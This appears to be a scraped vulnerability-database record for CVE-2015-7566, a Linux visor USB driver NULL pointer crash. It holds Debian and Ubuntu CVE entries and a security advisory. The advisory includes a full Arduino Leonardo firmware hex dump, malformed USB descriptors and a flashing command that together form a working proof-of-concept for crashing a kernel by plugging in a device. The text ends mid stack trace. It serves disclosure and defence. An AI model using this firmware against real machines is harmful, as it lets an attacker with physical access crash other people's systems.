\n:1006E000282F30E0F901E853FF4F8491F901EA51D6 \n:1006F000FF4F1491F901EC5FFE4F04910023C9F004 \n:10070000882321F069830E94F7026981E02FF0E0DD \n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 \n:100720008C91611103C01095812301C0812B8C93A2 \n:100730009FBF0F90DF91CF911F910F910895CF939D \n:10074000DF93282F30E0F901E853FF4F8491F9013E \n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 \n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 \n:10077000EE5DFE4FA591B4912C912D2381E090E088 \n:1007800021F480E002C080E090E0DF91CF910895F5 \n:10079000615030F02091F100FC0120830196F8CFE8 \n:1007A000289884E680937D0508951092E9001092C0 \n:1007B00071051092700590936F0580936E050895F2 \n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 \n:1007D000BA01C8010E94A606F80120E030E08EEFC1 \n:1007E0002C173D0791F1F7FE02C0A49101C0A08132 \n:1007F000609170057091710540916E0550916F0583 \n:1008000064177507ACF49091E8009570E1F390914E \n:10081000E80092FD1CC0A093F100A0917005B0917A \n:1008200071051196AF73BB27AB2B11F48093E800D1 \n:10083000A0917005B09171051196B0937105A093C8 \n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC \n:100850009FEFDF91CF911F910F91FF9008951F920D \n:100860000F920FB60F9211246F927F928F929F92E8 \n:10087000AF92BF92CF92DF92EF92FF920F931F93AE \n:100880002F933F934F935F936F937F938F939F9398 \n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 \n:1008A0006297DEBFCDBF1092E9008091E80083FF20 \n:1008B00046C168E0CE010A960E94C80382EF809389 \n:1008C000E8009A8597FF05C08091E80080FFFCCF83 \n:1008D00003C08EEF8093E800892F807609F023C152 \n:1008E0008B85811105C01092F1001092F10020C19A \n:1008F000282F2D7F213009F41BC1853049F48091C8 \n:10090000E80080FFFCCF8C8580688093E30010C1F5 \n:10091000863009F0E1C02D8508891989223009F057 \n:10092000B3C0EC848E2D90E0209173053091740556 \n:10093000821793070CF09FC00E94D5031F92EF927D \n:100940008DE394E09F938F930E9483068CE0E89E52 \n:1009500070011124E0917505F0917605EE0DFF1DF3 \n:1009600089E0DE01119601900D928A95E1F7C801A8 \n:100970000E94D50349E050E0BE016F5F7F4F80E0E9 \n:100980000E94E0030F900F900F900F90C12CD12C7C \n:10099000612C712C33E7A32E34E0B32E4AEA842E67 \n:1009A00044E0942EE0917505F0917605EE0DFF1D63 \n:1009B000818590E0681679060CF0BAC07F926F923C \n:1009C000BF92AF920E948306E0917505F091760583 \n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 \n:1009E00080E00E94E0030F900F900F900F9000E0C6 \n:1009F00010E0E0917505F0917605EE0DFF1D028483 \n:100A0000F385E02DEC0DFD1D818590E00817190799 \n:100A10005CF51F930F939F928F920E948306E09143 \n:100A20007505F0917605EE0DFF1D0284F385E02D2E \n:100A3000EC0DFD1DC801880F991FA485B585A80F71 \n:100A4000B91F4D915C910284F385E02DE80FF91FE9 \n:100A50006081718180E00E94E0030F5F1F4F0F9063 \n:100A60000F900F900F90C5CF8FEF681A780A8EE025 \n:100A7000C80ED11C97CF8FED94E09F938F930E9467 \n:100A800083060F900F9058C0C8012A8B0E94D5038F \n:100A90002A892130C1F0233009F04EC08C851F9285 \n:100AA0008F9389EF94E09F938F930E94830642E097 \n:100AB00050E062E871E080E00E94E0030F900F9048 \n:100AC0000F900F9035C04091000150E060E071E060 \n:100AD00080E00E94E0032CC0873071F1883021F45F \n:100AE00081E08093F10024C0893011F5937021F5E5 \n:100AF000EDE4F1E081E021E096E38093E9002093CA \n:100B0000EB0034913093EC009093ED008F5F3196C1 \n:100B1000843099F78EE78093EA001092EA008C8582 \n:100B20008093720505C0888999890E94D50304C005 \n:100B30008EEF8093E80003C081E28093EB00629621 \n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE \n:100B5000EF91BF91AF919F918F917F916F915F9135 \n:100B60004F913F912F911F910F91FF90EF90DF9048 \n:100B7000CF90BF90AF909F908F907F906F900F908D \n:100B80000FBE0F901F9018951F920F920FB60F92E5 \n:100B900011248F939F938091E1001092E10083FFD5 \n:100BA0000FC01092E90091E09093EB001092EC00DE \n:100BB00092E39093ED001092720598E09093F0000C \n:100BC00082FF1AC080917E05882339F080917E05CE \n:100BD000815080937E05882369F080917D0588236C \n:100BE00059F080917D05815080937D05811104C06D \n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE \n:100C00000F901F901895CF93DF93CDB7DEB782E199 \n:100C1000FE013596A0E0B1E001900D928A95E1F7D2 \n:100C20008F89988D9093760580937505898D9A8D1F \n:100C300090937405809373058B8D9C8D90937C05A8 \n:100C400080937B058D8D9E8D90937A058093790599 \n:100C50008F8D98A1909378058093770510927205F7 \n:100C600081E08093D70080EA8093D80082E189BD3B \n:100C700009B400FEFDCF61E070E080E090E00E94EA \n:100C80007B0280E98093D8008CE08093E200109290 \n:100C9000E000559A209ADF91CF91089581E08093EA \n:100CA000E00008959091C80095FFFCCF8093CE009E \n:100CB00008951092CD0087E68093CC0088E1809360 \n:100CC000C9008EE08093CA0008950F931F93CF93BD \n:100CD000DF93EC018C01FE0101900020E9F73197D0 \n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E \n:100CF000F80181918F010E945206EDCFDF91CF91D3 \n:100D00001F910F910895CF93DF93CDB7DEB7DA959A \n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 \n:100D2000419151919F0160E071E0CE0101960E94D6 \n:100D30000707CE0101960E946506D3950FB6F89479 \n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE \n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 \n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E \n:100D70003F932F9389839A830E9483068981882ECB \n:100D80009A81992E0F900F9000E010E08EE5E82EEA \n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 \n:100DA000E4F4F40181914F0190E09F938F93FF92BF \n:100DB000EF920E9483060F5F1F4FC8018F70992723 \n:100DC0000F900F900F900F90892B41F7DF92CF92E9 \n:100DD0000E9483060F900F90E1CF81E194E09F93F2 \n:100DE0008F930E9483060F900F900F900F90DF91CA \n:100DF000CF911F910F91FF90EF90DF90CF90BF9018 \n:100E0000AF909F908F900895F8940C94E809AEE00D \n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 \n:100E20004C831A83098377FF02C060E070E8615049 \n:100E300071097E836D83A901BC01CE0101960E94D8 \n:100E400033074D815E8157FD0AC02F8138854217D7 \n:100E500053070CF49A01F801E20FF31F10822E964B \n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB \n:100E7000B1097C016B018A01FC0117821682838112 \n:100E800081FFBDC1CE0101964C01F7019381F601AE \n:100E900093FD859193FF81916F01882309F4ABC184 \n:100EA000853239F493FD859193FF81916F018532ED \n:100EB00029F4B70190E00E941B09E7CF512C312C97 \n:100EC00020E02032A0F48B3269F030F4803259F007 \n:100ED000833269F420612CC08D3239F0803339F4CB \n:100EE000216026C02260246023C0286021C027FD25 \n:100EF00027C030ED380F3A3078F426FF06C0FAE00C \n:100F00005F9E300D1124532E13C08AE0389E300DA1 \n:100F10001124332E20620CC08E3221F426FD6BC1C9 \n:100F2000206406C08C3611F4206802C0883641F473 \n:100F3000F60193FD859193FF81916F018111C1CFDE \n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B \n:100F5000F9830DC0833631F0833771F0833509F0A2 \n:100F60005BC022C0F801808189830E5F1F4F44243B \n:100F70004394512C540115C03801F2E06F0E711CDE \n:100F8000F801A080B18026FF03C0652D70E002C08B \n:100F90006FEF7FEFC5012C870E9410092C018301A0 \n:100FA0002C852F77222E17C03801F2E06F0E711CAE \n:100FB000F801A080B18026FF03C0652D70E002C05B \n:100FC0006FEF7FEFC5012C870E9405092C012C854E \n:100FD0002068222E830123FC1BC0832D90E048163D \n:100FE0005906B0F4B70180E290E00E941B093A94E0 \n:100FF000F4CFF50127FC859127FE81915F01B701B0 \n:1010000090E00E941B0931103A94F1E04F1A510808 \n:101010004114510471F7E5C0843611F0893639F571 \n:10102000F80127FF07C060817181828193810C5F85 \n:101030001F4F08C060817181882777FD8095982FA8 \n:101040000E5F1F4F2F76B22E97FF09C090958095A7 \n:10105000709561957F4F8F4F9F4F2068B22E2AE089 \n:1010600030E0A4010E944D09A82EA81844C085377D \n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E \n:10108000BF2E8F36C1F018F4883579F0B4C08037A0 \n:1010900019F0883721F0AFC02F2F2061B22EB4FE97 \n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D \n:1010B0009660B92E06C028E030E005C020E130E09F \n:1010C00002C020E132E0F801B7FE07C06081718103 \n:1010D000828193810C5F1F4F06C06081718180E027 \n:1010E00090E00E5F1F4FA4010E944D09A82EA81882 \n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 \n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 \n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 \n:10112000FE01EA0DF11D8081803311F4297E09C092 \n:1011300022FF06C07394739404C0822F867809F04E \n:10114000739423FD13C020FF06C05A2C731418F4A7 \n:10115000530C5718732C731468F4B70180E290E0B5 \n:101160002C870E941B0973942C85F5CF731410F4FF \n:10117000371801C0312C24FF12C0B70180E390E082 \n:101180002C870E941B092C8522FF17C021FF03C05A \n:1011900088E590E002C088E790E0B7010CC0822F9C \n:1011A000867859F021FD02C080E201C08BE227FD64 \n:1011B0008DE2B70190E00E941B09A51438F4B70135 \n:1011C00080E390E00E941B095A94F7CFAA94F4019F \n:1011D000EA0DF11D8081B70190E00E941B09A1106A \n:1011E000F5CF332009F451CEB70180E290E00E94A0 \n:1011F0001B093A94F6CFF7018681978102C08FEFE1 \n:101200009FEF2C96E2E10C94CD09FC010590615012 \n:1012100070400110D8F7809590958E0F9F1F08950C \n:10122000FC016150704001900110D8F780959095B5 \n:101230008E0F9F1F08950F931F93CF93DF93182F47 \n:10124000092FEB018B8181FD03C08FEF9FEF20C041 \n:1012500082FF10C04E815F812C813D814217530770 \n:101260007CF4E881F9819F012F5F3F4F3983288308 \n:10127000108306C0E885F985812F0995892B29F708 \n:101280002E813F812F5F3F4F3F832E83812F902FF1 \n:10129000DF91CF911F910F910895FA01AA2728306D \n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 \n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF \n:1012C000781F891F9A1FA11D680F791F8A1F911D02 \n:1012D000A11D6A0F711D811D911DA11D20D009F452 \n:1012E00068943F912AE0269F11243019305D319394 \n:1012F000DEF6CF010895462F4770405D4193B3E07D \n:101300000FD0C9F7F6CF462F4F70405D4A3318F023 \n:10131000495D31FD4052419302D0A9F7EACFB4E0D4 \n:10132000A6959795879577956795BA95C9F700978C \n:101330006105710508959B01AC010A2E069457952D \n:10134000479537952795BA95C9F7620F731F841F84 \n:10135000951FA01D0895EE0FFF1F0590F491E02D3D \n:1013600009942F923F924F925F926F927F928F9249 \n:101370009F92AF92BF92CF92DF92EF92FF920F9324 \n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E \n:10139000F894DEBF0FBECDBF09942A8839884888EB \n:1013A0005F846E847D848C849B84AA84B984C88481 \n:1013B000DF80EE80FD800C811B81AA81B981CE0F78 \n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D \n:0413D000F894FFCFBF \n:1013D4001201000200000040AD0BEFBE000101024B \n:1013E4000001220342006100640020004200410029 \n:1013F40042004500250078002500780025006E0095 \n:1014040025007000180342004100440020004300FE \n:10141400300046004600450045002100120100024C \n:10142400000000404C0544010001010203010902CF \n:10143400270001010000FA0705810104040C0705D7 \n:10144400010104000C0705820104000C07000700D9 \n:101454000700480100500072006F006C00690066CC \n:101464000069006300000A550000006BFD180A00C3 \n:10147400809F0AB901312B940A8101128946001315 \n:10148400000257028B0A5E0AF80A5F01F212010099 \n:1014940002010000400D055702000101020301B9D9 \n:1014A4000A0100F80A5F0A810A220342006100640B \n:1014B400002000420041004200450025007800253C \n:1014C40000780025006E00250070001803420041DA \n:1014D400004400200043003000460046004500451B \n:1014E40000210012010002010000400D0557020016 \n:1014F400010102030109040000030100000003F2DA \n:101504000AEC0A0902270001010000FA01AB0A09EA \n:101514000400000301000000090200202020202014 \n:101524005F5F5F5F5F5F5F5F2020202020202020BF \n:1015340020202020202020202020202020202020A7 \n:1015440020205F5F5F5F5F205F5F20205F2020209F \n:101554002020205F5F0A0D00202020202F205F5FC5 \n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 \n:101574005F5F20205F5F5F5F5F20202020202F209F \n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 \n:10159400202F5F5F0A0D002020202F202F202020E5 \n:1015A4002F205F5F205C2F205F5F20602F205F5F14 \n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A \n:1015C400205C2F205F5F2F202F205F5F5F2F202F55 \n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 \n:1015E4002F202F202F202F5F2F202F202F5F2F2001 \n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 \n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD \n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 \n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F \n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 \n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 \n:101654003C3C2043485241534820414E59204F506E \n:1016640045524154494E472053595354454D203E09 \n:101674003E0A0D00203C3C202863292053657267F4 \n:10168400656A20536368756D696C6F20323031353B \n:101694002C204F70656E536F7572636520536563BC \n:1016A40075726974792052616C66205370656E6E30 \n:1016B4006562657267203E3E0A0D000A3E3E205078 \n:1016C4007265737320627574746F6E20746F207307 \n:1016D4007461727420657865637574696F6E2E2EFB \n:1016E4002E0A0D005B44454255475D2045786563ED \n:1016F400757465207061796C6F616420300A0D0027 \n:10170400526563762D446174613A0A0D005B444569 \n:101714004255475D200953656E6420436F6E6669C8 \n:101724006775726174696F6E44657363726970740E \n:101734006F720928696E6465783A2569292E2E2E00 \n:101744000D0A005B44454255475D200953656E64AC \n:1017540020496E74657266616365204465736372C3 \n:101764006970746F720928696E7465726661636565 \n:101774003A2569292E2E2E0D0A005B444542554711 \n:101784005D200953656E6420456E64706F696E74E4 \n:101794002044657363726970746F720928656E649E \n:1017A400706F696E743A2569292E2E2E0D0A005B1E \n:1017B40044454255475D203C3C70616E6963206D31 \n:1017C4006F64653F3E3E0D0A005B44454255475DEC \n:1017D4002009203E3E20537472696E67204465736D \n:1017E40063726970746F72207265717565737420A9 \n:1017F4002D2073656E64696E67206D616C666F720F \n:101804006D656420737472696E67212073657475E5 \n:10181400702E7756616C75654C203D3D2025690D11 \n:101824000A005B48455844554D505D0A0D0025306B \n:041834003258200006 \n:00000001FF \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136141/OSS-2016-09_visor_clie_5_attach.txt"}], "debiancve": [{"lastseen": "2023-08-14T03:12:23", "description": "The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel through 4.4.1 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a bulk-out endpoint.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-08T03:59:00", "type": "debiancve", "title": "CVE-2015-7566", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7566"], "modified": "2016-02-08T03:59:00", "id": "DEBIANCVE:CVE-2015-7566", "href": "https://security-tracker.debian.org/tracker/CVE-2015-7566", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntucve": [{"lastseen": "2023-08-15T22:08:35", "description": "The clie_5_attach function in drivers/usb/serial/visor.c in the Linux\nkernel through 4.4.1 allows physically proximate attackers to cause a\ndenial of service (NULL pointer dereference and system crash) or possibly\nhave unspecified other impact by inserting a USB device that lacks a\nbulk-out endpoint.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1534440>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-07T00:00:00", "type": "ubuntucve", "title": "CVE-2015-7566", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7566"], "modified": "2016-02-07T00:00:00", "id": "UB:CVE-2015-7566", "href": "https://ubuntu.com/security/CVE-2015-7566", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7566"], "modified": "2016-03-09T00:00:00", "id": "EXPLOITPACK:C617424ADAF7B063C6D9C6F505360E69", "href": "", "sourceData": "OS-S Security Advisory 2016-09\nLinux visor clie_5_attach Nullpointer Dereference\n\nDate: March 4th, 2016\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\nCVE: CVE-2015-7566\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (visor clie_5_attach driver)\nSeverity: Critical. The Kernel panics. A reboot is required.\nEase of Exploitation: Trivial\nVulnerability type: Wrong input validation\nProducts: RHEL 7.1 including all updates\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\nVendor: Red Hat\nVendor contacted: November, 12th 2015\nPDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf\n\nAbstract:\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \ndevice requiring the visor (clie_5_attach) driver.\n\nDetailed product description:\nWe confirmed the bug on the following system:\nRHEL 7.1\nKernel 3.10.0-229.20.1.el7.x86_64\nFurther products or kernel versions have not been tested.\nHow reproducible: Always\nActual results: Kernel crashes.\n\nDescription:\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor:\n\n[*] Device-Descriptor\nbLength:\t0x12\nbDescriptorType:\t0x1\nbcdUSB:\t0x200\nbDeviceClass:\t0x3\nbDeviceSubClass:\t0x0\nbDeviceProtocol:\t0x0\nbMaxPacketSize:\t0x40\nidVendor:\t0x54c\nidProduct:\t0x144\nbcdDevice:\t0x100\niManufacturer:\t0x1\niProduct:\t0x2\niSerialNumbers:\t0x3\nbNumConfigurations:\t0x1\n\nThe clie_5_attach function of the visor driver, which is called during the \ndriver initialization process, expects an OUT-Bulk-Endpoint. \nDue to an incomplete sanity check, the visor driver tries to dereference null-\npointers. \nThis results in a crash of the system.\n\n****\n$ nm visor.ko.debug | grep clie_5_attach\n0000000000000030 t clie_5_attach\n$ addr2line -e visor.ko.debug 6d\n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_\n64/drivers/usb/serial/visor.c:610\n****\n\n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)\n...\n607\n608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);\n609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)\n610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT-\nbulk-endpoint, the kernel tries to dereference null-pointers */\n611\n612 return 0;\n613 }\n...\n****\n\n[*] Configuration-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x2\nwTotalLength:\t0x27\nbNumInterfaces:\t0x1\nbConfigurationValue:\t0x1\niConfiguration:\t0x0\nbmAttributes:\t0x0\nbMaxPower:\t0x31\n[*] Interface-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x4\nbInterfaceNumber:\t0x0\nbAlternateSetting:\t0x0\nbNumEndpoints:\t0x3\nbInterfaceClass:\t0x0\nbInterfaceSubClass:\t0x0\nbInterfaceProtocol:\t0x0\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x81\t\u00ef?? IN-Direction\nbmAttribut:\t0x1\t\u00ef?? ISO-Transfer\nwMaxPacketSize:\t0x404\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x1\t\u00ef??OUT-Direction\nbmAttribut:\t0x1\t\u00ef??ISO-Transfer (change this \nvalue to 0x2, which is the value for bulk-transfer without additional \nfeatures, and the visor driver won't crash)\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x82\t\u00ef??IN-Direction\nbmAttribut:\t0x1\t\u00ef??ISO-Transfer\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n\nProof of Concept:\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device.\n\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex\n\nThe firmware has been attached to this bug report.\nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3!\n\nSeverity and Ease of Exploitation:\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required.\n\nVendor Communication:\nWe contacted Red Hat on the November, 12th 2015.\nThis bug was fixed upstream. A CVE number was not assigned.\n\nReferences:\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283371\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\nd=cb3232138e37129e88240a98a1d2aba2187ff57c\n\nKernel Stacktrace:\n\n[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd\n[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144\n[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3\n[ 34.799619] usb 1-1: Product: \u00c4?\n[ 34.804592] usb 1-1: Manufacturer: \u00c4?\n[ 34.810144] usb 1-1: SerialNumber: %\n[ 34.872285] usbcore: registered new interface driver visor\n[ 34.879838] usbserial: USB Serial support registered for Handspring Visor / \nPalm OS\n[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0\n[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5\n[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected\n[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000058\n[ 34.921136] IP: [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\n[ 34.921136] PGD 0 \n[ 34.921136] Oops: 0002 [#1] SMP \n[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \ndm_mirror dm_region_hash dm_log dm_mod\n[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1\n[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\n[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\n[ 34.921136] RIP: 0010:[<ffffffffa039306d>] [<ffffffffa039306d>] \nclie_5_attach+0x3d/0x60 [visor]\n[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286\n[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000\n[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0\n[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000\n[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0\n[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200\n[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000\n[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\n[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4: \n00000000000006f0\n[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000\n[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\n[ 34.921136] Stack:\n[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8\n[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000\n[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000\n[ 34.921136] Call Trace:\n[ 34.921136] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\n[ 34.921136] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\n[ 34.921136] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\n[ 34.921136] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\n[ 34.921136] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\n[ 34.921136] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\n[ 34.921136] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\n[ 34.921136] [<ffffffff813d34b3>] 